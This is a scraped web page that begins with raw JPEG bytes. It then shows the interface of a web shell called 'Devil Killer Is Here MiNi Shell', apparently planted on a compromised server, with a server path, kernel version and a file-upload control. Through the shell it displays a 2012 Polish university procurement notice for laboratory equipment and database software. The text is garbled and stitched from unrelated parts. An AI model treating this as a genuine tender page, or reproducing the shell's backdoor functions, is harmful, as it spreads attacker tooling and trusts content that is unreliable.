JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120127/24039-N-2012.html

<p class="kh_header"><b>Olsztyn: Dostawa fabrycznie nowego wyposażenia do Pracowni Materiałów Budowlanych, Pracowni Materiałów i Nawierzchni Drogowych, Pracowni Badań Nieniszczących oraz Laboratorium Pozyskiwania i Przetwarzania geo - danych dla potrzeb Systemów Informacji Przestrzennej w ramach realizacji projektu pt. Wyposażenie w sprzęt aparaturowy laboratoriów nauk technicznych na rzecz zwiększenia ogólnodostępnej oferty badawczej UWM w Olsztynie.</b><br>
<b>Numer ogłoszenia: 24039 - 2012; data zamieszczenia: 27.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warmińsko-Mazurski w Olsztynie , ul. Oczapowskiego 2, 10-719 Olsztyn, woj. warmińsko-mazurskie, tel. 089 5233420, faks (089) 5233278.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> uwm.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa fabrycznie nowego wyposażenia do Pracowni Materiałów Budowlanych, Pracowni Materiałów i Nawierzchni Drogowych, Pracowni Badań Nieniszczących oraz Laboratorium Pozyskiwania i Przetwarzania geo - danych dla potrzeb Systemów Informacji Przestrzennej w ramach realizacji projektu pt. Wyposażenie w sprzęt aparaturowy laboratoriów nauk technicznych na rzecz zwiększenia ogólnodostępnej oferty badawczej UWM w Olsztynie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa fabrycznie nowego wyposażenia do Pracowni Materiałów Budowlanych, Pracowni Materiałów i Nawierzchni Drogowych, Pracowni Badań Nieniszczących oraz Laboratorium Pozyskiwania i Przetwarzania geo - danych dla potrzeb Systemów Informacji Przestrzennej w ramach realizacji projektu pt. Wyposażenie w sprzęt aparaturowy laboratoriów nauk technicznych na rzecz zwiększenia ogólnodostępnej oferty badawczej UWM w Olsztynie.
Przedmiot zamówienia został podzielony na 7 części:
Część nr 1: Piknometry szklane 
Część nr 2: Kolby Le Chateliera
Część nr 3: Szkło
Część nr 4: Narzędzia
Część nr 5: Stopery
Część nr 6: Platforma do opracowań statystycznych,
Część nr 7: Systemu Zarządzania Bazami Danych Przestrzennych typu Oracle lub równoważny.
W przypadku wskazania w opisie przedmiotu zamówienia nazw własnych, patentów, pochodzenia lub wskazania parametrów technicznych wskazujących na produkt konkretnego producenta Zamawiający zgodnie z treścią art. 29 ust. 3 ustawy prawo zamówień publicznych dopuszcza możliwość składania ofert równoważnych.
Część nr 1 - Piknometry
1.Piknometry szklane (lub z tworzywa nietłukącego) z rurką boczną;
1.1.Piknometry zgodne z PN EN 1097;
1.2.Pojemność 50cm3 (2 szt.), 100cm3 (2 szt.), 500cm3 (2 szt.), 1000cm3 (2 szt.),;
1.3.Zakres pomiarowy piknometrów  pH 0 - 19;
1.4.Piknometry - zakres temperatury 0 - 100 st. C;
Część nr 2 - Kolby Le Chateliera -
Kolby Le Chateliera nietłukące się (lub szklane) kolby o pojemności 50, 100; 500; 1000 cm3 po 3 szt. każdych
Część nr 3 - Szkło
1.Cylindry nietłukące się: poj. 1000 ml szt. 10; poj. 500 ml szt. 20; poj.  250 ml szt. 10; poj. 100 ml szt.10;
2.Zlewki nietłukące się poj. 250-300 ml - 20 szt.;
3.Zlewki poj. 3000ml - 10szt.;
4.Kolba stożkowa z korkiem 300ml - 20 szt.;
5.Kolba kulista szklana płaskodenna z krótką szyją ze szlifem, z korkiem 250 ml - 20 szt.; 500 ml - 20szt.;
6.Kolba kulista szklana płaskodenna z krótką szyją ze szlifem, z korkiem - 2 szt.;
7.Butla laboratoryjna ze szlifem, z korkiem 500 ml - 10 szt.; 1000ml - 10 szt.; 5000ml - 10 szt.;
8.Rozpylacz bezciśnieniowy z tworzywa 500 ml - 2 szt.;
9.Probówki z tworzywa z nakrętką 10 ml; 15 ml; 30 ml; 50 ml po 20 szt.;
10.Parownica szklana, płaskodenna, z wylewem, 320 ml - 40 szt.;
11.Parownica porcelanowa okrągłodenna z wylewem 350 ml - 40 szt.;
12.Moździerz porcelanowy gładki z wylewem 500 ml - 20 szt.;
13.Eksykator szafkowy z tworzywa normalny 247 ml - 8 szt.;
14.Rozdzielacz gruszkowy 100ml, kram szklany, korek - 10 szt.;
15.Tygle porcelanowe 50ml; 85 ml; 120ml - po 20 szt.;
Część nr 4 - Narzędzia
1.Szczotki druciane 20 szt.;
2.Chwytak nożycowy do gorących przedmiotów - 8 szt.;
3.Korkobor o średnicy 5-26 mm - 8szt.;
4.Szpachelki różne szt. 30;
5.Młotek 500g , szt. 6;
6.Statywy do probówek o fi 13 mm - 4 szt.;
Część nr 5 - Stopery -
Stopery elektroniczne 8 szt.;
duży wyświetlacz dla lepszej czytelności; 
24 godzinny chronograf i timer; 
wodoszczelność.
Część nr 6 - Platforma do opracowań statystycznych
Przedmiotem zamówienia jest dostawa platformy do opracowań statystycznych Vanguard Business Analytics Suite (lub równoważnej) - typ licencji: desktop, wersja business, o parametrach: 
a.Dodatek Decision Tree Analysis;
b.Zawierający moduły analiz drzewa decyzyjnego i symulacji Markowa;
c.Dodatek Forecasting;
d.Zawierający prognozy serii czasowych i analizy statystyczne, możliwość importu danych z arkuszy MS Excel, baz danych , aplikacji sieciowych, plików CSV;
e.Dodatek Monte Carlo Simulation;
f.Zawierający symulację Monte Carlo oraz analizy istotności;
g.Dodatek Optimization;
h.Zawierający optymalizację liniową, 
nie-liniową, stochastyczną i całkowitą;
i.Dodatek Web Development.
Część nr 7 - Systemu Zarządzania Bazami Danych Przestrzennych 
1.System Zarządzania bazą danych przestrzennych;
2.Licencja nieograniczona w czasie i w ilości użytkowników (typu serwerowego);
3.Baza danych powinna zawierać mechanizm do automatycznego zarządzania przechowywaniem danych na dyskach, łączący w sobie wydajność z dużymi możliwościami konfiguracją bazy danych;
4.Baza powinna zapewniać wielodostęp do danych przez pracujących równolegle użytkowników;
5.Baza powinna udostępniać narzędzia do jej monitoringu oraz diagnostyki;
6.Baza powinna umożliwiać wydajne doładowanie danych oraz przenoszenia danych pomiędzy bazami;
7.Baza powinna dostarczać mechanizmy transakcyjności wykonywanych na niej operacji;
8.Baza powinna dostarczać mechanizmy zapisu oraz operacji na danych przestrzennych Oracle Locator lub równoważny;
9.Baza powinna być dostosowana do zarządzania danymi zapisanymi w standardzie Oracle Locator lub równoważnym;
10.Baza powinna zawierać odpowiednio skonfigurowany schemat bazy danych MDSYS, zawierający metadane na potrzeby aplikacji współpracujących typu Geomedia Professional lub równoważny;
11.System musi spełniać następujące cechy:
a.wysoka dyspozycyjność
b.wydajność i możliwość rozbudowy w przyszłości bez konieczności
zmiany architektury
c.bezpieczeństwo
d.zaawansowane usługi aplikacji
e.łatwość administrowania systemami.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie ww. warunku Zamawiający odstępuje od dokonania opisu sposobu oceny ich spełnienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie dokumentu rejestrowego, formularz ofertowy sporządzony przez Wykonawcę według wzoru zamieszczonego na stronie Działu Zamówień Publicznych UWM w Olsztynie, opis przedmiotu zamówienia sporządzony przez Wykonawcę według wzoru zamieszczonego na stronie Działu Zamówień Publicznych UWM w Olsztynie</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.
2.Zamawiający przewiduje w ramach zawartej umowy zmiany dotyczące:
a. zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności nie dających się przewidzieć przed zawarciem umowy, np.  działanie siły wyższej,
b. zmiany terminu realizacji umowy, ze względu na wystąpienie okoliczności, których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
c. zmiany terminu realizacji umowy, z uwagi na trwające prace budowlane w obiekcie 
do którego dostarczony będzie asortyment objęty niniejszą umową.
3.W przypadku zaistnienia którejś z wymienionych okoliczności, strony ustalają nowy termin  realizacji przedmiotu umowy, 
4.Wszelkie zmiany zapisów umowy winny być dokonywane w formie pisemnej (aneksu do umowy).
5.W przypadku wycofania lub zaprzestania produkcji przedmiotu umowy istnieje możliwość dostarczenia sprzętu o parametrach równoważnych lub lepszych po przedstawieniu przez Sprzedawcę stosownego oświadczenia producenta zawierającego informację o czasie zaprzestania produkcji, wprowadzenia modelu zastępującego wycofany i równoważności, bądź lepszych parametrach od modelu wycofanego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uwm.edu.pl/zamowienia<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Warmińsko - Mazurski w Olsztynie, Dział Obsługi Projektów Europejskich, ul. Prawocheńskiego 4, 10 - 720 Olsztyn.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2012 godzina 10:00, miejsce: Uniwersytet Warmińsko - Mazurski w Olsztynie, Dział Obsługi Projektów Europejskich, ul. Prawocheńskiego 4, 10 - 720 Olsztyn.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dostawa fabrycznie nowego wyposażenia do Pracowni Materiałów Budowlanych, Pracowni Materiałów i Nawierzchni Drogowych, Pracowni Badań Nieniszczących oraz Laboratorium Pozyskiwania i Przetwarzania geo - danych dla potrzeb Systemów Informacji Przestrzennej w ramach realizacji projektu pt. Wyposażenie w sprzęt aparaturowy laboratoriów nauk technicznych na rzecz zwiększenia ogólnodostępnej oferty badawczej UWM w Olsztynie.Umowa POPW.01.03.00-28-021.09.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Piknometry szklane.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Piknometry szklane (lub z tworzywa nietłukącego) z rurką boczną
1.1.Piknometry zgodne z PN EN 1097;
1.2.Pojemność 50cm3 (2 szt.), 100cm3 (2 szt.), 500cm3 (2 szt.), 1000cm3 (2 szt.);
1.3.Zakres pomiarowy piknometrów  pH 0 - 19;
1.4.Piknometry - zakres temperatury 0 - 100 st. C;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kolby Le Chateliera.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kolby Le Chateliera nietłukące się (lub szklane) kolby o pojemności 50, 100; 500; 1000 cm3 po 3 szt. każdych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Szkło.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Cylindry nietłukące się: poj. 1000 ml szt. 10; poj. 500 ml szt. 20; poj.  250 ml szt. 10; poj. 100 ml szt.10;
2.Zlewki nietłukące się poj. 250-300 ml - 20 szt.;
3.Zlewki poj. 3000ml - 10szt.;
4.Kolba stożkowa z korkiem 300ml - 20 szt.;
5.Kolba kulista szklana płaskodenna z krótką szyją ze szlifem, z korkiem 250 ml - 20 szt.; 500 ml - 20szt.;
6.Kolba kulista szklana płaskodenna z krótką szyją ze szlifem, z korkiem - 2 szt.;
7.Butla laboratoryjna ze szlifem, z korkiem 500 ml - 10 szt.; 1000ml - 10 szt.; 5000ml - 10 szt.;
8.Rozpylacz bezciśnieniowy z tworzywa 500 ml - 2 szt.;
9.Probówki z tworzywa z nakrętką 10 ml; 15 ml; 30 ml; 50 ml po 20 szt.;
10.Parownica szklana, płaskodenna, z wylewem, 320 ml - 40 szt.;
11.Parownica porcelanowa okrągłodenna z wylewem 350 ml - 40 szt.;
12.Moździerz porcelanowy gładki z wylewem 500 ml - 20 szt.;
13.Eksykator szafkowy z tworzywa normalny 247 ml - 8 szt.;
14.Rozdzielacz gruszkowy 100ml, kram szklany, korek - 10 szt.;
15.Tygle porcelanowe 50ml; 85 ml; 120ml - po 20 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Narzędzia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Szczotki druciane 20 szt.;
2.Chwytak nożycowy do gorących przedmiotów - 8 szt.;
3.Korkobor o średnicy 5-26 mm - 8szt.;
4.Szpachelki różne szt. 30;
5.Młotek 500g , szt. 6;
6.Statywy do probówek o fi 13 mm - 4 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Stopery.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Stopery elektroniczne 8 szt.;
duży wyświetlacz dla lepszej czytelności; 
24 godzinny chronograf i timer; 
wodoszczelność..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Platforma do opracowań statystycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa platformy do opracowań statystycznych Vanguard Business Analytics Suite (lub równoważnej) - typ licencji: desktop, wersja business, o parametrach: 
a.Dodatek Decision Tree Analysis;
b.Zawierający moduły analiz drzewa decyzyjnego i symulacji Markowa;
c.Dodatek Forecasting;
d.Zawierający prognozy serii czasowych i analizy statystyczne, możliwość importu danych z arkuszy MS Excel, baz danych , aplikacji sieciowych, plików CSV;
e.Dodatek Monte Carlo Simulation;
f.Zawierający symulację Monte Carlo oraz analizy istotności;
g.Dodatek Optimization;
h.Zawierający optymalizację liniową, 
nie-liniową, stochastyczną i całkowitą;
i.Dodatek Web Development..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Systemu Zarządzania Bazami Danych Przestrzennych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.System Zarządzania bazą danych przestrzennych
2.Licencja nieograniczona w czasie i w ilości użytkowników (typu serwerowego);
3.Baza danych powinna zawierać mechanizm do automatycznego zarządzania przechowywaniem danych na dyskach, łączący w sobie wydajność z dużymi możliwościami konfiguracją bazy danych,
4.Baza powinna zapewniać wielodostęp do danych przez pracujących równolegle użytkowników;
5.Baza powinna udostępniać narzędzia do jej monitoringu oraz diagnostyki;
6.Baza powinna umożliwiać wydajne doładowanie danych oraz przenoszenia danych pomiędzy bazami;
7.Baza powinna dostarczać mechanizmy transakcyjności wykonywanych na niej operacji;
8.Baza powinna dostarczać mechanizmy zapisu oraz operacji na danych przestrzennych Oracle Locator lub równoważny;
9.Baza powinna być dostosowana do zarządzania danymi zapisanymi w standardzie Oracle Locator lub równoważnym;
10.Baza powinna zawierać odpowiednio skonfigurowany schemat bazy danych MDSYS, zawierający metadane na potrzeby aplikacji współpracujących typu Geomedia Professional lub równoważny;
11.System musi spełniać następujące cechy:
a.wysoka dyspozycyjność
b.wydajność i możliwość rozbudowy w przyszłości bez konieczności
zmiany architektury
c.bezpieczeństwo
d.zaawansowane usługi aplikacji
e.łatwość administrowania systemami.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.02.2012.</p></li>
